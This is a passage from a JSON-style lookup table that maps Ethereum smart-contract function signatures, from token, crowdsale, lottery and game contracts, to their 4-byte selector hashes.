"web3ViewRoll(bytes32,bytes32,uint256,uint256,uint256)": "0xd0b94ffe", "checkHash(bytes32,bytes32,uint256)": "0x0ddd0824", "soliditySha3(bytes32)": "0x3698de0a", "getHashedData(uint256,uint256,bytes32,bytes32,uint256)": "0x8f64337d", "setNotary(address,bool)": "0xe564fd25", "forwardGas(address,uint256)": "0x4774ef06", "updateGuMasks(uint256,uint256)": "0x8ce0080f", "updateGenGuVault(uint256)": "0x05c7603d", "calcUnMaskedGuEarnings(uint256)": "0x8013f267", "transferGu(address,uint256)": "0xed58c840", "updateReferralMasks(uint256)": "0x448246c3", "checkDoubledProfit(uint256,uint256)": "0x3fd9c56d", "getCurrentPhraseInfo()": "0x863e7e4b", "CrabCoin()": "0xa21ea6b7", "sayNo()": "0xba95b235", "sayYes()": "0x9bee3365", "ChainBankToken(uint256)": "0xed2e3f7e", "EtherJob()": "0x33a8319e", "claimWin(bytes32,uint8,bytes32,bytes32)": "0x95199b24", "joinGame(bytes32)": "0xbf474766", "withdrawSurprisePot(address)": "0xd43c45b8", "withdrawAffiliatePot(address)": "0x20c2d5e4", "withdrawJackPot(address)": "0x08b7c837", "withdrawDeveloperPot(address)": "0xd22341a9", "setMinimumWait(uint256)": "0x97b51442", "resumePlaying()": "0x2e466373", "stopPlaying()": "0xef5fbdb2", "GenomaToken()": "0x0b4130f2", "createChild()": "0xa3a4ba31", "Parent()": "0xd3c8dd69", "GetProfitEarnedByPartner(address)": "0x2cacb97c", "SplitDividendsAmongstOwners(uint256)": "0xf18b7bde", "UpdateDividendPartners(address[],uint256[])": "0x1bbc99c6", "UpdateCurrency(uint256,string,string,string,string)": "0x43f73a3d", "EtherBetIO(address)": "0xcad283a0", "addArtifact(string,string,bytes32)": "0x960983f4", "addWebsite(address,string)": "0x434e6a55", "PenPalToken()": "0x78e4d750", "updateTokenNameAndSymbol(string,string)": "0xb9ceda19", "buy(string,string,uint256,address,address,address,address,bytes2)": "0xb7a2e1f2", "NlvToken(uint256,string,string)": "0xf742048b", "register(bytes32,bytes32,address,bytes32,bytes32)": "0x4470da90", "forkMe()": "0x412b2ee0", "sendTo(address,address,uint256,bytes)": "0xb9d69a30", "collectEther()": "0xff11e1db", "collectToken(address)": "0x395ede4d", "updateFactory(address)": "0xd9f165dc", "updateToken(address,uint256)": "0x2bce9e7b", "updateBalances(address)": "0x8bef7ba5", "subWallets()": "0x187cbdd2", "PeaceToken(uint256,string,string)": "0x15b88b35", "ZepCloud()": "0x09e24516", "buyIcoTokens()": "0x75421e93", "buyPreIcoTokens()": "0x2d132467", "totalIcoTokensSold()": "0x4ad5f440", "maxIcoTokensSold()": "0xde377015", "setup(address,uint256,uint256)": "0x64f6f7b9", "RAGTOKEN()": "0x4fe85563", "pdo()": "0xc83927a0", "sendTo(address,uint256,uint256)": "0xb67f4eff", "gateways()": "0x093a86d3", "pausable(bool)": "0x272870ac", "setIntArr(uint256,address)": "0x2375da83", "getAsBytes(uint256,uint256)": "0x7b9e5bec", "setIntArr(uint256,uint256)": "0xd3943ab4", "getArrLength()": "0x27e9b1a0", "getSumData(bytes32)": "0x29a833ee", "Storesumdata(bytes32,bytes32,uint64)": "0xce79d17d", "CryptoniumCoin()": "0x1301c4aa", "AMC()": "0xd51eda9a", "CCoinToken()": "0xe9edd759", "transferFromReserve(uint256,address)": "0x0a39e222", "ticketCountMax()": "0x032be08b", "balanceOfOld(address)": "0x276c9d0a", "sellMyTokensDaddy()": "0x75c7d4e1", "withdrawOld(address)": "0x39ffe67c", "adminEditCity(uint16,string,uint256,address)": "0xf93e2d31", "makeOfferForCity(uint16,uint256)": "0xee5845cc", "makeOfferForCityForSomeone(uint16,uint256,address)": "0xe6c89d4a", "AdminBuyForSomeone(uint16,address)": "0xe3b55276", "acceptOfferForCity(uint256,uint16,uint256)": "0xdc1c1389", "adminAddCountry(string)": "0xdb5a2778", "MONUMENT_CITY_FEE()": "0xd02e8f70", "totalOffer()": "0xbd1de900", "adminAddMonument(string,uint256,uint16)": "0xb2bdc6b3", "cancelOfferForCity(uint256)": "0xae93e513", "ECONOMY_BOOST()": "0xa27c1756", "MAX_CITIES()": "0xa2741bdb", "adminAddCity(string,uint256,uint16)": "0xa25fc8dc", "buyCity(uint16)": "0xa0bde945", "cancelSellCityForEther(uint16)": "0x9e65a03a", "sellCityForEther(uint16,uint256)": "0x96dbad1e", "offers(uint256)": "0x8a72ea6a", "resolveSellCityForEther(uint16)": "0x8973e316", "buyMonument(uint256,uint256)": "0x839acf14", "MONUMENT_UN_FEE()": "0x82b57b96", "adminWithdraw(uint256)": "0x7c5b4a37", "unitedNations()": "0x6e2c10a1", "cities(uint256)": "0x6a51b918", "ECONOMY_BOOST_TRADE()": "0x5a768e4a", "UNITED_NATIONS_FUND()": "0x4c34d7e9", "BUY_CITY_FEE()": "0x4a87e08a", "monuments(uint256)": "0x37f83291", "countries(uint256)": "0x08e9daa5", "Receive()": "0x9f1b3bad", "setContract(address)": "0x75f890ab", "getFunds()": "0x4d9b3735", "snikerts()": "0x656ea1f6", "ENSRegistry()": "0x1cb120d6", "multiERC20TransferTightlyPacked(address,bytes32[])": "0xf8f1d927", "escapeHatchDestination()": "0xf5b61230", "init(address,address)": "0xf09a4016", "changeHatchEscapeCaller(address)": "0xd836fbe8", "newOwnerCandidate()": "0xd091b550", "multiCallTightlyPacked(bytes32[])": "0xac66777f", "escapeHatch(address)": "0xa142d608", "isTokenEscapable(address)": "0x892db057", "proposeOwnership(address)": "0x710bf322", "removeOwnership(address)": "0x666a3427", "multiERC20Transfer(address,address[],uint256[])": "0x35a21728", "changeOwnership(address)": "0x2af4c31e", "multiTransferTightlyPacked(bytes32[])": "0x2a17e397", "escapeHatchCaller()": "0x1f6eb6e7", "multiCall(address[],uint256[])": "0x1476e40f", "EtherOlympics()": "0x4ce37426", "implementsERC721d()": "0x6417c08b", "EtherIslands()": "0xcbc52ee4", "hireBountyHunter(uint256)": "0xe1baed1a", "killFeed()": "0xc1bd1e85", "getUsers()": "0x00ce8e3e", "getOwnersBalance()": "0xee1971ea", "getNextPrizePool()": "0xeb51e575", "getPlayersBalance(address)": "0xd3c18378", "prizePoolPercent()": "0xcf00d4b9", "ownerProfitPercent()": "0xc0036137", "getMyPoints()": "0xba9c4637", "getPrizePool()": "0x884bf67c", "playersPoints(address)": "0x7c22232a", "prizePool()": "0x719ce73e", "requiredPoints()": "0x6e12b46e", "nextPrizePool()": "0x63860139", "getPlayersPoints(address)": "0x5698176a", "allowedBetAmount()": "0x5352aadb", "withdrawOwnersFunds()": "0x52c5d892", "nextPrizePoolPercent()": "0x4f9000a0", "withdrawMyFunds()": "0x4935e740", "playersStorage(address)": "0x40d3d25a", "placeBet(address)": "0x30996897", "getPlayerData(address)": "0x2aa531d9", "tryauthenticate(bytes)": "0xcb4bc2e9", "s(bytes)": "0x9c97114b", "msgHash(bytes)": "0x6ff9db5b", "r(bytes)": "0x6826ebf8", "signer(bytes)": "0x4c466d37", "winner()": "0xdfbf53ae", "buttonClicks()": "0xa73b60f4", "ClickButton()": "0x8bde7fc3", "withdrawTips()": "0x3aaa74b2", "deadline()": "0x29dcb0cf", "Win()": "0x29822734", "tips()": "0x1a4e1e78", "addDefenceParts(uint8[])": "0xf794e7f2", "mintParticularPart(int256,uint8[4],address)": "0x07f95fc2", "addressToUser(address,address)": "0xbc4fe17e", "PART_REWARD_CHANCE()": "0xed06fb91", "deprecateTurretSubtype(uint8)": "0xe4f843f9", "setScrapPercent(uint8)": "0xdfdce77b", "setScrapMinStartPrice(uint256)": "0xdae6f081", "withdrawAuctionBalance()": "0xd8eb3a98", "setRewardChance(uint256)": "0xd7e31d67", "hasMigrated(address)": "0xd7625c88", "getManagerCut(uint256,uint256)": "0xbf464090", "setGameStartTime(uint256)": "0x2769c89a", "createToken(uint256,uint256)": "0x2a805069", "EtherTower()": "0x809282b2", "ARM1Token()": "0xd97036c2", "SmartExchange(string,string,uint8,uint256)": "0x60542557", "fundBurn(address,uint256)": "0x8cc9638c", "fundTransferWithin(address,address,uint256)": "0xc6291223", "fundTransferOut(address,address,uint256)": "0xfa1ad09e", "fundTransferIn(address,address,uint256)": "0xf9e4fb34", "fundBalanceOf(address,address)": "0x5a7b4097", "dissolveFund()": "0x4b1c5597", "registerFund()": "0xcf8407c9", "issueTranche(uint256)": "0x510b1529", "extractToken(address,address)": "0x20f65816", "extractEther(address)": "0x551cacfd", "Versioned(string)": "0xc56e3849", "FRPTOKEN()": "0xf11b9b46", "contractBoost(uint256)": "0x17eb85e3", "userTransfer()": "0x2a9fb9b2", "userCreate(string,string)": "0x2ad4d818", "ownerConfig(address,uint256,uint256)": "0xc7e6d04f", "publicGetAdvertisement(uint256)": "0x98b41763", "publicGetStatus()": "0x712f7790", "Fosha(uint256,uint256,uint256,uint256,uint256)": "0x6aafd194", "PublicSale(address,address,address,address,uint256,uint256,uint256)": "0xa9ec77d3", "setMin(uint256)": "0x45dc3dd8", "MAVCash(uint256,string,uint8,string)": "0xc0a7f894", "mdbToken()": "0x66e16aff", "CCH_RE_1()": "0xb5d1548c", "OXO(uint256,string,string)": "0xcc09c6b3", "changeEscapeHatchCaller(address)": "0x33de06d5", "Escapable(address,address,address)": "0xc191d37d", "TravelNationCoin(uint256,string,uint8,string)": "0x684efc40", "winningTickets()": "0x47e0d54a", "addToPool()": "0xc07401f0", "getWeeklyTickets(address)": "0x203985d6", "getDailyTickets(address)": "0xab1bef4e", "editTicketPrice(uint256)": "0xf7ee503e", "editDailyLimit(uint256)": "0xf9d75f25", "getLotteryWinners()": "0x5592fc71", "getWeeklyLotteryParticipants(uint256)": "0x47e271b8", "getDailyLotteryParticipants(uint256)": "0xf02f1b6f", "awardWeeklyLottery(address,uint256)": "0x794e9434", "awardDailyLottery(address,uint256)": "0x4f3f4211", "drawWeeklyWinner()": "0xf1208af8", "drawDailyWinner()": "0xd23b8f5c", "LDGToken()": "0xdf2a2753", "migrateHolders(uint256)": "0xddf41bf4", "FUNCToken(uint256,string,string)": "0xeb09b5bc", "eosLITE(uint256,uint256)": "0x777c1bb2", "MuellerFiredby51()": "0xcf8e9996", "WylSistContract()": "0x6ef791bb", "unsoldCleanUp()": "0xfcf8566e", "CirclesTokenOffering(address,uint256,uint256,uint256,uint256,uint256,address)": "0x6affe07b", "FoundGameCoin()": "0xdfdb27da", "setPlatinumAddress(address,address)": "0x749843ea", "reduce(uint256)": "0x83f7e2d7", "produce(uint256)": "0x65da5603", "PlatinumToken(uint256,string,uint8,string)": "0x9191b520", "info(string)": "0x17fab0a0", "convert2PlatinumToken(uint256)": "0xa6327ffc", "convert2Platinum(uint256)": "0xdec7ee57", "setTokenAddress(address,address)": "0xc7afe9f2", "alchemy(uint256)": "0xa69520aa", "ship(string)": "0xdd3fa136", "stock(string,string,uint256,string)": "0x0c1925f3", "Platinum()": "0x10a4fd08", "PFG(uint256,string,string,bool)": "0x68e114db", "CAC()": "0xee718c60", "VICETOKEN_ICO_IS_A_SCAM()": "0x59810024", "distributeETHOS(address[],uint256)": "0x824e5ebf", "ETHOS()": "0x2a258842", "getTotalSendingAmount(uint256[])": "0x8db54c90", "allowanceForContract(address)": "0x16c3002e", "balanceOfContract(address)": "0xdd48087f", "batchTransferToken(address,address[],uint256[])": "0x20651d5d", "BLOCKMALL()": "0x7a6d8030", "averageSalePrice()": "0x010342f4", "AetherClockAuction(address,uint256)": "0x9515af55", "EBCBToken()": "0x23d533c8", "jackpot(uint256,uint256)": "0xe6b1e71c", "grandJackpot(uint256,uint256)": "0x5e62af4d", "ETStarPresale(address,uint256,uint256)": "0x552eb9e2", "CLC(uint256,string,string)": "0xd8b9a7e8", "tokensOfkitty(uint32)": "0x5b530196", "getAuctions()": "0xd7c06919", "getKittyInfo(uint256)": "0x75ca3b2e", "_createKittyToken(address,uint256,uint32)": "0x16962d7f", "KittyToken()": "0x502cc114", "PopeCoin(uint256,string,uint8,string,address)": "0xe3686b49", "MenglaToken(address)": "0xf3f1e4ea", "AllCash()": "0x9565f2fe", "CSToken(uint256,string,uint8,string)": "0xbb4b236a", "getTimeSinceLastEvent(address)": "0xdc9b6d68", "getMyTime()": "0x7d0e750d", "getShitClonelordReq()": "0xd28be797", "becomeShitClonelord()": "0x5cddb74b", "getMyShitClone()": "0x6a8ef2d3", "getFreeShitClone()": "0xda27ab1f", "setApp(string,uint256,address)": "0xded5bd14", "setNewChecker(address,address)": "0xc8578967", "SomniumToken()": "0x26b92a0e", "appSet()": "0x69bdd5dd", "manager()": "0x481c6a75", "isStoreActive(uint256)": "0x8cc60a61", "getStoreAddressById(uint256)": "0x65ef7b95", "totalStores()": "0x15f063f7", "TootrTokenSale()": "0x670fe0ff", "setOnlyShowPurchased(bool)": "0x9521000c", "setMaxBlockPurchaseInOneGo(uint256)": "0x19eae36b", "setPricePerBlockInWei(uint256)": "0xb61992e7", "blocknumber()": "0x05062247", "nextHash()": "0x727f0067", "nativeBlockhash(uint256)": "0x8da8a5ae", "getPurchasedBlockhash(uint256)": "0x36f19b77", "tokenIdOf(uint256)": "0x06474d12", "blocknumbersOf(uint256)": "0xfc12c7da", "nextPurchasableBlocknumber()": "0x4bf96e60", "purchaseBlock(uint256,uint256)": "0xce5a63ff", "mint(bytes32,uint256,string)": "0x9fb6c796", "DART()": "0xf0646a3c", "__callback(bytes32,uint256)": "0xaae9d7ed", "safeMemoryCleaner()": "0x28fdcdf7", "tfg()": "0xa0ab2847", "settingsSwitchTransferAccess()": "0x26b6c0b4", "serviceChangeOwner(address)": "0x4279523e", "settingsSetWeiPerMinToken(uint256)": "0x231b48aa", "serviceGroupGet(address)": "0x887d813d", "AutoCoin(string,string,uint8,uint256,uint256)": "0x7586fcc5", "userApprove(address,uint256,uint256)": "0x3691dd11", "userTransferFrom(address,address,uint256)": "0x73654b6d", "userTransfer(address,uint256)": "0x946ca295", "proveAndClaim(bytes,bytes,bytes)": "0xd94585bd", "claim(bytes,bytes)": "0xbe27b22c", "verifyDSHash(uint8,bytes,bytes)": "0x89080102", "hash(bytes,bytes,uint256)": "0x68f9dab2", "verify(bytes,bytes)": "0xf7e83aee", "verify(bytes,bytes,bytes)": "0xde8f50a1", "fromBytes(bytes)": "0x215b3e32", "TheMLMDemo()": "0xd5996502", "transferOne(address,uint256)": "0xdbb57a4b", "burnExcess()": "0x6fee8458", "AllSportsCoin()": "0x5fdc1a97", "jdalevsystemscoin()": "0xc527018b", "disableBlacklist(address[])": "0x1c59a667", "enableBlacklist(address[])": "0xebce79ff", "getAuthByPhone(string)": "0xbd684865", "getAuthByCode(string)": "0x67e53196", "addAuthByPhone(string,string)": "0x90b7df75", "addAuthByCode(string,string,string)": "0xf8229eba", "YinchengToken(address,address)": "0x3ac2f3cc", "findWinner(uint256)": "0x05e49d1d", "addWinner(uint256)": "0x3aee0254", "hash(bytes32,address,uint256)": "0x29594e4f", "hash(bytes32,uint256)": "0x3abf30fc", "isMigrated(string,string)": "0xc0bac1a8", "toggleMinting()": "0x7d55094d", "HZRToken(address)": "0xcb424c24", "StupidityToken()": "0xc01e3985", "wwasCoin()": "0x6ccab1f3", "transferAndCall(address,uint256,bytes,string)": "0xf404d1e2", "approveAndCall(address,uint256,bytes,string)": "0x09a547bd", "extendPeriod(uint256)": "0x25406480", "_updateStage(uint256,uint256)": "0xf9dbe5e9", "_getNextStage()": "0xd22bdce2", "getAmountForCurrentStage(uint256)": "0x8cc99aa3", "getReferrals(address[])": "0xf7c07442", "getUserHistory(address)": "0x4fb3d3b1", "distributeTeam()": "0x8656dcb6", "withdrawBounty(address)": "0x6dbf8108", "withdrawTeam(address)": "0x3a838636", "U42Token()": "0xaa613faf", "OffMenuMorselToken()": "0x45aa7f69", "WakaWakaCoin()": "0xb3209136", "getAssetData(address)": "0x1652e7b7", "getUserAssetBalance(address)": "0xa2ac0a1a", "createNewAsset(string,string,uint256)": "0xd7fc23a2", "addUser(uint256,string,string,uint256)": "0x1382e75e", "getFreeNapkins()": "0x48a73e96", "GRAC2Coin()": "0x17dba48c", "QLANCE()": "0x5720988b", "BitCharityToken()": "0x583ae991", "setvolumebounus(uint256,uint256,uint256)": "0x72b902a7", "setcapbounus(uint256,uint256,uint256)": "0xb954ca70", "setlockaddress(address,uint256)": "0xb1cd79de", "MorpheusTokenFAKE()": "0xde28ba54", "getIntervalCoefficient(bytes2,uint256)": "0xc78982d5", "getIntervalCoefficientMultiplier(uint256,uint256,uint256,uint256)": "0x202bc7e7", "validate(uint256,uint256,uint256,uint256,string,string,string)": "0xb2e4d35d", "calculatePremium(uint256,uint256,uint256,uint256,string,string,string)": "0x8031e85c", "GPRDSQToken()": "0x70cd9bfd", "DharmCoin()": "0x71101891", "getVote(string)": "0xbaa40e5c", "addToTrusted(string)": "0xe154179e", "viewToken()": "0x9ab4833e", "whoOwner()": "0xb5a46d5e", "BOBOTOKEN()": "0xe17928ba", "galleassMint(address,uint256)": "0xe2155c14", "galleassTransferFrom(address,address,uint256)": "0xa3bbc294", "validDelegate(address,string,address)": "0x1ecc05f2", "EthereumDIDRegistry()": "0xb7019063", "CSCToken()": "0xa4bce83c", "frozenRules(address,uint256)": "0x918898a5", "teamAllocation()": "0x6816521a", "registerSale(address,address)": "0x7a1ac566", "applyMigrate(uint256)": "0x92550bdd", "ZeusShieldCoin()": "0x01c96df6", "getAuthorizedOwners()": "0x5a414ff6", "getWeaponList()": "0x0394b9ce", "getOwnerOf(uint256)": "0x83638710", "getAllWeaponData(uint256)": "0x98943c88", "getOwnerProprietaryData(uint256)": "0x135fae64", "getPublicData(uint256)": "0x6c86ac5a", "getGameProprietaryData(uint256)": "0x085431f4", "updateOwnerOfWeapon(uint256,address)": "0x71f027fa", "updateOwnerProprietaryData(uint256,string)": "0xa525663a", "updatePublicData(uint256,string)": "0xbfc303fa", "updateGameProprietaryData(uint256,string)": "0x641e8cca", "updateWeapon(uint256,string,string,string)": "0x1f48af0a", "addWeapon(uint256,string,string,string,address)": "0x4557a579", "removeAuthorizeduser(address)": "0x5c6ae355", "addAuthorizedOwners(address)": "0x3cd109cb", "WeaponTokenize()": "0x95522e54", "A2UToken()": "0x5812f78a", "BKBK()": "0x13dc01bb", "reapFarm()": "0x5ac7b9f3", "pepFarm()": "0xa4575296", "PepFarmer()": "0xe2757a50", "numberOfTreasuryOfficials()": "0xe704430d", "replaceOfficials(address[])": "0x44af1f4b", "acceptGiftTokens(address)": "0xff2b350d", "pilfer(uint256)": "0x143a1a2f", "bribe()": "0x37d0208c", "liquidate(uint256)": "0x415f1240", "philanthropise(string)": "0x8126e4e3", "UselessReserveBank()": "0xf16638ec", "gubbermentOverthrown()": "0x950f4170", "coupDetat(address)": "0xefc018cc", "Gubberment()": "0x2f6b7bbd", "ZNCoin()": "0xf685f942", "OrpheusMarinaBangkok()": "0x59c8bf9c", "Omnic(string,string,uint256,uint256)": "0x3717a7a7", "populateFromOldContract(uint256[])": "0x05917369", "setOldContract(address)": "0xe0e04685", "setDividendCutPercentage(uint256)": "0xb775553d", "setMainPoolCutPercentage(uint256)": "0xa1b608c9", "_updatePools(uint8,uint256)": "0x1e5d2e78", "createMultiple(uint256[],uint256[],uint256[],uint256[],uint8[],uint256[],address[])": "0x03af2cda", "createToken(uint256,uint256,uint256,uint256,uint8,uint256,address)": "0x6a01b6e6", "checkResult()": "0xa21d942f", "changeInfo(string)": "0x19465953", "emergency(address,uint8,bytes32,bytes32,uint8,bytes32,bytes32)": "0x0ca97903", "userHasPattern(address)": "0x53a40850", "removePatternUserIndex(address,bytes32)": "0x0d88fb04", "addPatternUserIndex(address,bytes32)": "0xd414da2a", "prefixedHash2(address)": "0x27f1bb7f", "prefixedHash(string)": "0xbee2135e", "verifyOwner(bytes32,address,uint8,bytes32,bytes32)": "0x99e3a723", "changeMessage(bytes32,string,uint8,bytes32,bytes32)": "0x977af81c", "transferPattern(bytes32,address,string,uint8,bytes32,bytes32)": "0x94ccbc1f", "createPattern(bytes32,string,address,string)": "0xdbaec0fd", "checkPatternExistance(bytes32)": "0xe09dbfa4", "TGEToken(string,string)": "0xd2d10be8", "REALEX()": "0x8d56ac74", "GXESwapper()": "0x89574144", "FDSToken()": "0x73aef263", "ZingToken()": "0xac77eb8e", "NICTO()": "0xe2daeb9c", "Newera()": "0xc5fc43cb", "storeStages(uint256[])": "0x73a7b8b2", "getParams()": "0x5e615a6b", "purchase(bytes32,bytes32,bytes32)": "0x87fef15b", "initializeBalances()": "0xf232e351", "OxToken()": "0x46656c46", "TimeChain()": "0xbf4a79e6", "ownerRemoveRole(address,string)": "0xa35bfcac", "ownerAddRole(address,string)": "0x5ea81231", "sendToContract(address,uint256,bytes)": "0xe877f910", "spaceCount()": "0x319ae4b2", "getUserId(uint256)": "0xebc98117", "getUserSpaceIds(uint256)": "0xfb0101c4", "getSpaceByIndex(uint256)": "0x7a6994dc", "addSpace(uint256,uint256,bytes,uint256,uint256,uint256,uint256,string,string,uint256)": "0x2b6a8b46", "SpaceRegistry()": "0x932c360d", "LuxProject()": "0x631d9b1f", "Blizzard()": "0x2c66a604", "SHEX(uint256,string,uint8,string)": "0xac824fd9", "ACEEquityToken(uint256,string,string,uint8)": "0xc6fc2bae", "HDCToken()": "0x21a4cdaf", "MacQueenToken()": "0x6c751622", "BlueSkyDragon()": "0x0fd4d286", "MCNC()": "0x54aa0546", "GOCToken()": "0x82c26c6a", "DVChain(uint256,string,string)": "0x335f463d", "FFG(uint256,string,string)": "0x86908f93", "PrettyGirl(uint256,string,string)": "0xe2f45eba", "SovietCoin()": "0x4d40f03c", "getAllMoneyOut()": "0x906a114c", "_transferAct(address,address,uint256)": "0x03090958", "left20(uint256)": "0x32064db7", "right20(uint256)": "0xe2c718d8", "left19(uint256)": "0x71dd46a9", "right19(uint256)": "0x54400c60", "left18(uint256)": "0x64faf22c", "right18(uint256)": "0x56ca528f", "left17(uint256)": "0x10cfcc19", "right17(uint256)": "0x9002dba4", "left16(uint256)": "0x2909cc5d", "right16(uint256)": "0xcf460fa5", "left15(uint256)": "0xed64b36b", "right15(uint256)": "0x1d09ba2c", "left14(uint256)": "0x223dcc74", "right14(uint256)": "0x93b14daa", "left13(uint256)": "0x0c4bfa94", "right13(uint256)": "0xea7f4d27", "left12(uint256)": "0x407fce7b", "right12(uint256)": "0x440208c3", "left11(uint256)": "0x91d15735", "right11(uint256)": "0x023a624a", "left10(uint256)": "0x8f4613d5", "right10(uint256)": "0x508762c1", "left9(uint256)": "0x01f99ad7", "right9(uint256)": "0x7138ef52", "left8(uint256)": "0x3792a018", "right8(uint256)": "0x25e524d3", "left7(uint256)": "0x506bff11", "right7(uint256)": "0xb7b96723", "left6(uint256)": "0x885ec18e", "right6(uint256)": "0xaa058a73", "left5(uint256)": "0xd3e141e0", "right5(uint256)": "0x38e586fd", "left4(uint256)": "0x48e61782", "right4(uint256)": "0xa0db0a22", "left3(uint256)": "0x94d63afd", "right3(uint256)": "0x3b8ecdf9", "left2(uint256)": "0x1cdb8571", "right2(uint256)": "0xe7a01215", "left1(uint256)": "0x32931fbb", "right1(uint256)": "0xc7b98dec", "left100(uint256)": "0xd9e68b44", "right100(uint256)": "0x05fe035f", "nextRand(uint256)": "0xb5d02a56", "finish(uint256)": "0xd353a1cb", "start(uint256)": "0x95805dad", "MultisigWalletMock(address[],uint256,uint256)": "0xe1863b19", "unreserve(address,uint256)": "0x11c911d9", "reserve(address,uint256)": "0xcc47a40b", "getReservedBalance(address)": "0xb18a714e", "getAvailableBalance(address)": "0x6c24a76f", "give(address,uint256)": "0xf00388f7", "SimpleCustodian()": "0x0867ecf3", "changeMyString(string)": "0x20f4914a", "changeOpenString(string)": "0xef474056", "changeOpenNumber(uint256)": "0x97994b96", "StateHolder()": "0xb9559685", "getMyEntry()": "0x5df607f0", "setEntry(string)": "0x4b369820", "calculateProof(string)": "0x76dbd108", "buySampleTokens(address)": "0xa2dfa2f0", "createTokenContract(string,string,uint8,uint256)": "0x9784af62", "SampleCrowdsale(uint256,uint256,uint256,address,uint256,string,string,uint8,uint256)": "0xa548617c", "SampleCrowdsaleToken(string,string,uint8,uint256)": "0x85be2f02", "onPresaleComplete()": "0x5215cb88", "purchasePresale(address,uint256)": "0x4e5b5f54", "process(uint256)": "0xffb2c479", "startPresale()": "0x04c98b2b", "commit(uint256)": "0xf4f98ad5", "changePresale(address,uint256[])": "0xc40b8868", "setPresale(uint256,address,uint256[])": "0x96fc00c2", "withdrawDonations()": "0xce1b088a", "pledge()": "0x88ffe867", "currentDonation()": "0xd150f835", "SHIP(uint256,uint256,uint256)": "0x14653f87", "mid(uint256,uint256,uint256)": "0x33eb5564", "scale(uint256,uint256,uint256,uint256,uint256)": "0x8572e364", "basis(uint256,uint256)": "0xb3936f95", "buy(address)": "0xf088d547", "startSale(uint256,uint256,uint256,uint256)": "0x4a24edd6", "EightBitToken()": "0x1252aadb", "withdrawlWinnings()": "0x05b4655a", "pickBigWinner()": "0xdba9daab", "pickSmallWinner()": "0x5dd283cb", "getTicket()": "0xc002c4d6", "currentJackPot()": "0x57400cf3", "currentRate()": "0xf9f8bdb7", "fundOrder(uint256)": "0xb9c4d0a7", "Proxy(address,address,uint256,uint256,uint256)": "0x29a8fcd2", "sendOwnerEther(address)": "0x3e50b0b8", "set_timeframes(uint256,uint256)": "0xa1b162a8", "losses()": "0x6f22d6a5", "CONFIG_MAX_EXPOSURE_DIV()": "0x41c1f017", "CONFIG_MAX_EXPOSURE_MUL()": "0x402d1c9c", "wins()": "0x24de908d", "CONFIG_DICE_SIDES()": "0x0d30afb0", "setup(uint256,uint256,uint256,address,uint256,uint256,bytes,address,address)": "0xf58a1adb", "random(uint256,uint256,address)": "0xf7ba8896", "Kolidat()": "0x2f32013d", "kolidat()": "0x7df4c235", "mymethod(uint256,string)": "0xc2a98b41", "deleteProposal(bytes32,string)": "0x4d7ad1dd", "getProposal(bytes32,string)": "0xc9c92dc5", "commitProposal(bytes32,string)": "0xdf4cbb96", "verifyProposal(bytes32,address,address,uint256,bytes32,string)": "0x0a9fc06f", "voteProposal(bytes32,address,address,uint256,bytes32,string,bytes)": "0xa828251e", "getWeight(bytes32)": "0x66435abf", "setWeight(bytes32,uint256)": "0x71c4275a", "publicKeys(bytes32)": "0xf03dc5ef", "countOfPublicKey(bytes32)": "0xc79c9105", "existPublicKey(bytes32,address)": "0xd4ee9fba", "deletePublicKey(bytes32,address)": "0xfa31b371", "addPublicKey(bytes32,address)": "0x1de1ee7b", "existPlatform(bytes32)": "0x5de047d3", "deletePlatform(bytes32)": "0x8147bcf7", "addPlatform(bytes32)": "0xdf8d66e4", "getCallers()": "0xdd8d4c40", "existCaller(address)": "0x7cbd9e8d", "deleteCaller(address)": "0x258c0f1e", "toCompare(uint256,uint256)": "0x3ffc813f", "XC()": "0x4232a399", "unlock(string,bytes32,address,address,uint256)": "0x1f220be0", "lock(bytes32,address,uint256)": "0x0899146b", "getCompare()": "0x37881299", "setCompare(bytes2)": "0x8e87f57c", "getXCPlugin()": "0x4567a6a7", "setXCPlugin(address)": "0x8aa5440e", "getPlatformName()": "0xdb3b73db", "GameCoinToken()": "0x1edc44ed", "setBroker(address,address,uint256)": "0x9d6e0c22", "Broker(bool)": "0xe7c5d907", "UNFOMO(string,string,uint256,uint256,bool)": "0x6e3de78a", "parseAddress(bytes32)": "0x24fcb80c", "parseUint(bytes32)": "0xab831144", "parseBool(bytes32)": "0x8f6245e1", "RankingBallGoldCrowdsale(bytes32[5])": "0x35b6cc03", "validPeriods()": "0x820f52bc", "saleFinished()": "0x365b94ad", "getStageIndex()": "0x98dc8b44", "initStages(uint32[],uint32[],uint128[],uint128[],uint128[],bool[])": "0x845f5593", "StagedCrowdsale(uint256)": "0x9a7754d6", "MiniMeBaseCrowdsale(address)": "0x4170e191", "registered(address)": "0xb2dd5c07", "KYCCrowdsale(address)": "0xbef80387", "setBonusesForAmounts(uint128[],uint32[])": "0x0a06f35e", "BlockIntervalCrowdsale(uint256)": "0x8f627aab", "generateTargetTokens(address,uint256,uint256)": "0xc02738da", "afterGeneratorHook()": "0x7254e1ba", "finalizationSuccessHook()": "0xab9c20d0", "finalizationFailHook()": "0x01fd1b1d", "buyTokensPostHook(address,uint256,uint256)": "0x85908ffa", "buyTokensPreHook(address,uint256)": "0xf059bb6d", "calculateToFund(address,uint256)": "0xea4061cc", "BaseCrowdsale(uint256)": "0x9f161d39", "getVariableReleasableAmount(address)": "0x585b143a", "getStraightReleasableAmount(address)": "0xb08b3410", "getReleasableAmount(address)": "0x2afd1a7d", "lock(address,bool,uint256[],uint256[])": "0x5de4c6fc", "getReleaseRatios(address)": "0x4a2d5b6b", "getReleaseTimes(address)": "0xd8018c42", "getTotalLockedAmounts(address)": "0xff42fd41", "getReleaseType(address)": "0xec86e1d7", "Locker(address,uint256,address[],uint256[])": "0x638e3724", "EOToken()": "0xc9de31c7", "setHardcupFalse()": "0xc25a796e", "setHardcupTrue()": "0x0bca1704", "BurnUnsoldToken(uint256)": "0xa324ed9f", "ManualTransfer(address,uint256)": "0xd8d34c89", "AriumToken()": "0xd7c06439", "viewContractHoldingToken()": "0x4737e852", "viewNextRelease(address)": "0xca64a095", "viewLockUpStatus(address)": "0xa9d9f644", "distributeBounty(address[],uint256[])": "0x1a38fa06", "setApprover(address)": "0x3156560e", "_releaseToken(address)": "0x50e81e08", "releaseTokenByOwner(address)": "0xf183452c", "removeReceiver(address)": "0x6552d8b4", "changeReceiver(address,address)": "0x4c69ec93", "addLockUpData(address,uint256[],uint256[])": "0xa543a7e5", "receiveTransferOwnership()": "0xc00ade41", "requestTransferOwnership(address)": "0x9d6fa618", "setGoalReached()": "0x77d6cfeb", "YohoToken()": "0x77079f55", "WILDToken()": "0x8528b7b0", 